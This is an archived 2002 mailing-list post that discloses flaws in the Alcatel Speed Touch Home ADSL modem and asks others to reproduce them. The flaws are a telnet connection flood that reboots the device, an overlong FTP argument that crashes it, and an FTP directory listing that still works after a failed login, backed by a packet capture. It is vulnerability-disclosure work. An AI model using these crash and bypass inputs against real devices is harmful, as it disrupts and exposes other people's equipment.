Hi cats n' kittens, I came across below, but Alcatel is unable to reproduce it they say. I was wondering wether anyone out there could do a quick test and supply me with some results to wave at them (if there indeed is an issue)? Below was tested with a Speed Touch Home modem, which would make these problems LAN/internal ones, but it is my understanding that the Speed Touch Pro has an external ip as well, which could extend the possibilities a bit :) Anyways, any feedback would be appreciated, on to the problem: 1) My Alcatel Speed Touch Home (GV8BAA3.253 - 997001) ADSL modem seems unable to handle a large number of connections to its telnet daemon. About 10-20 quick concurrent connections will cause the modem to reboot. 2) The size of arguments passed through ftp commands to the ftp server seems to be unchecked. This also allows someone to crash/reboot the modem: $ ftp 10.0.0.138 Connected to 10.0.0.138. 220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change. User (10.0.0.138:(none)): guest 331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required. Password: 530 Invalid password Login failed ls aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Interesting part here is that even though the login fails, it appears possible to pass the command to the server. It seems there is a problem with the ftp daemons authentication scheme, below test would appear to support that as well: 3) I have a sniffer running on the wire, listening for all traffic to and from the box's internal ip 10.0.0.150. The modem has ip 10.0.0.138. I log in with user/pass guest/guest, which are invalid for the modem. $ ftp 10.0.0.138 Connected to 10.0.0.138. 220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change. User (10.0.0.138:(none)): guest 331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required. Password: 530 Invalid password Login failed ls 200 Connected to 10.0.0.150 port 2681 530 Unknown user So far so good, I'm not allowed the listing, since I'm not properly logged in. However, the packetlog (NGSSniff) reveals the following: IP Header Length and version: 0x45 Type of service: 0x00 Total length: 74 Identifier: 27510 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xfa18 Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 21 Dest port: 2675 Sequence: 3435584144 ack: 1451021190 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 4096 Checksum: 0xb3ac Urgent Pointer: 0 Raw Data 35 33 30 20 49 6e 76 61 6c 69 64 20 70 61 73 73 (530 Invalid pass) 77 6f 72 64 0d 0a (word ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 76 Identifier: 58979 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0x7f29 Source IP: 10.0.0.150 Dest IP: 10.0.0.138 TCP Header Source port: 2675 Dest port: 21 Sequence: 1451021190 ack: 3435584166 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 64076 Checksum: 0x493d Urgent Pointer: 0 Raw Data 50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 35 30 2c (PORT 10,0,0,150,) 31 30 2c 31 31 36 0d 0a (10,116 ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 91 Identifier: 27520 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xf9fd Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 21 Dest port: 2675 Sequence: 3435584166 ack: 1451021214 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 4096 Checksum: 0x31c4 Urgent Pointer: 0 Raw Data 32 30 30 20 43 6f 6e 6e 65 63 74 65 64 20 74 6f (200 Connected to) 20 31 30 2e 30 2e 30 2e 31 35 30 20 70 6f 72 74 ( 10.0.0.150 port) 20 32 36 37 36 0d 0a ( 2676 ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 58 Identifier: 58992 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0x7f2e Source IP: 10.0.0.150 Dest IP: 10.0.0.138 TCP Header Source port: 2675 Dest port: 21 Sequence: 1451021214 ack: 3435584205 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 64037 Checksum: 0xeac1 Urgent Pointer: 0 Raw Data 4e 4c 53 54 0d 0a (NLST ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 70 Identifier: 27522 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xfa10 Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 21 Dest port: 2675 Sequence: 3435584205 ack: 1451021220 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 4096 Checksum: 0x97b8 Urgent Pointer: 0 Raw Data 35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user) 0d 0a ( ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 61 Identifier: 27523 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xfa18 Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 20 Dest port: 2676 Sequence: 3436864002 ack: 1453411572 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 4096 Checksum: 0x12c8 Urgent Pointer: 0 Raw Data 74 6f 74 61 6c 20 31 0d 0a (total 1 ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 101 Identifier: 27524 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xf9ef Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 20 Dest port: 2676 Sequence: 3436864011 ack: 1453411572 Header length: 0x80 Flags: 0x19 (ACK PSH FIN ) Window Size: 4096 Checksum: 0xdff8 Urgent Pointer: 0 Raw Data 61 63 74 69 76 65 0d 0a 64 6c 0d 0a 73 74 61 72 (active dl star) 74 75 70 2e 63 6d 64 0d 0a 47 56 38 41 41 41 31 (tup.cmd GV8AAA1) 2e 30 30 30 0d 0a 6d 6f 75 6e 74 2e 63 6d 64 0d (.000 mount.cmd ) 0a ( ) IP Header Length and version: 0x45 Type of service: 0x00 Total length: 132 Identifier: 27525 Flags: 0x0000 TTL: 64 Protocol: 6 (TCP) Checksum: 0xf9cf Source IP: 10.0.0.138 Dest IP: 10.0.0.150 TCP Header Source port: 21 Dest port: 2675 Sequence: 3435584205 ack: 1451021220 Header length: 0x80 Flags: 0x18 (ACK PSH ) Window Size: 4096 Checksum: 0xe525 Urgent Pointer: 0 Raw Data 35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user) 0d 0a 31 35 30 20 4f 70 65 6e 69 6e 67 20 64 61 ( 150 Opening da) 74 61 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 6f (ta connection fo) 72 20 2f 62 69 6e 2f 6c 73 0d 0a 32 32 36 20 30 (r /bin/ls 226 0) 20 6d 61 74 63 68 65 73 20 74 6f 74 61 6c 0d 0a ( matches total ) It seems the 'ls' is still executed anyways and that the ftp client (Win2k ftp.exe) is just witholding the information from me in some way. Above IS effectively a listing of my modems ftp "root". Any thoughts/comments/similar (or different) results? Much obliged :) Cheers, Thejian -- Best regards, Strumpf Noir Society mailto:vuln-devat_private "Mere accumulation of observational evidence is not proof." -- Death, "The Hogfather"
This archive was generated by hypermail 2b30 : Thu Feb 21 2002 - 15:00:03 PST